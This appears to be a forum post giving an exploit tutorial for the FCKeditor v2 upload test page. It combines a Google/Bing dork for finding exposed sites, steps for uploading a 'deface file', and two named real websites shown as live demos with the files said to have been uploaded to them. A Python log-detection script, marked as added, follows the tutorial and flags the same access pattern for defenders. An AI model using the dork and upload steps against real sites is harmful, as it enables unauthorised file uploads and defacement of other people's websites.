FCKeditor v2 Files Upload Exploit
Google and Bing Dork: intitle:"FCKeditor - Uploaders Tests"
Category: Dork
Exploit : http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Go to Google.com or Bing.com and type this Dork: intitle:"FCKeditor - Uploaders Tests"
(use both search engines to find more vulnerable websites)
Now you'll get the FCKeditor upload option; you can reach the upload option by going to this URL:
http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Now change the "File Uploader to use" selection to PHP.
Then select your .txt deface file and click "Send it to the server" (some websites allow you to upload .html and .jpg files).
If your file uploaded successfully, you will get a "File uploaded with no errors" alert.
To view your file, see the Uploaded File URL,
or go to http://www.website.domain/userfiles/yourfilehere or http://www.website.domain/path/userfiles/yourfilehere
Live Demo : http://www.relationshiptrends.com/affiliate/fckeditor/editor/filemanager/connectors/uploadtest.html
http://minisite.nku.edu.tr/fckeditor/editor/filemanager/connectors/uploadtest.html
Result :
http://minisite.nku.edu.tr//userfiles/aaaaaaaa.txt
http://www.relationshiptrends.com/affiliate/img/aaaaaaaa.txt
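Seen from the server side, the steps above leave a recognisable trail in the web access log: a visit to the uploadtest.html page, a POST to the connectors directory, and then a text or HTML file being served out of userfiles. The script below is an added example, not code from the original post, that classifies constructed Apache-style log lines against those three signals; the connector script path php/upload.php in the sample line is an assumption, not something the post states.

```python
import re
from typing import Iterator, Optional, Tuple

# Apache/Nginx "combined" access log prefix: client, ident, user, time, request, status, size.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Paths taken from the post: the test page and the directory uploads land in.
TEST_PAGE = "/filemanager/connectors/uploadtest.html"
CONNECTOR_DIR = "/filemanager/connectors/"
USERFILES_DIR = "/userfiles/"
# File types that should never be served from an editor's upload directory.
RISKY_EXT = (".php", ".phtml", ".html", ".htm", ".txt", ".js")


def classify(line: str) -> Optional[str]:
    """Return an alert name for a suspicious request, or None for benign/unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m["path"].split("?", 1)[0].lower()  # drop query string, normalise case
    if path.endswith(TEST_PAGE):
        return "fckeditor_uploadtest_access"
    if m["method"] == "POST" and CONNECTOR_DIR in path:
        return "fckeditor_connector_upload"
    if USERFILES_DIR in path and path.endswith(RISKY_EXT) and m["status"] == "200":
        return "userfiles_risky_file_served"
    return None


def scan(lines) -> Iterator[Tuple[str, str, str]]:
    """Yield (client_ip, alert, raw_path) for every line that trips a rule."""
    for line in lines:
        alert = classify(line)
        if alert:
            m = LOG_RE.match(line)
            yield m["ip"], alert, m["path"]


# Constructed sample log; the php/upload.php connector path is assumed, not from the post.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2010:13:55:36 +0000] "GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 2341',
    '203.0.113.5 - - [10/Oct/2010:13:55:51 +0000] "POST /fckeditor/editor/filemanager/connectors/php/upload.php?Type=File HTTP/1.1" 200 412',
    '203.0.113.5 - - [10/Oct/2010:13:56:02 +0000] "GET /userfiles/aaaaaaaa.txt HTTP/1.1" 200 17',
    '198.51.100.7 - - [10/Oct/2010:13:57:10 +0000] "GET /userfiles/image/logo.jpg HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2010:13:58:00 +0000] "GET /index.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, alert, path in scan(SAMPLE_LOG):
        print(f"{ip}\t{alert}\t{path}")
```

Three hits from the same client within a minute is the sequence the post describes; the jpg and index.php lines stay quiet.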
I spent 30 minutes writing this post,
so please spend 30 seconds and write a comment below.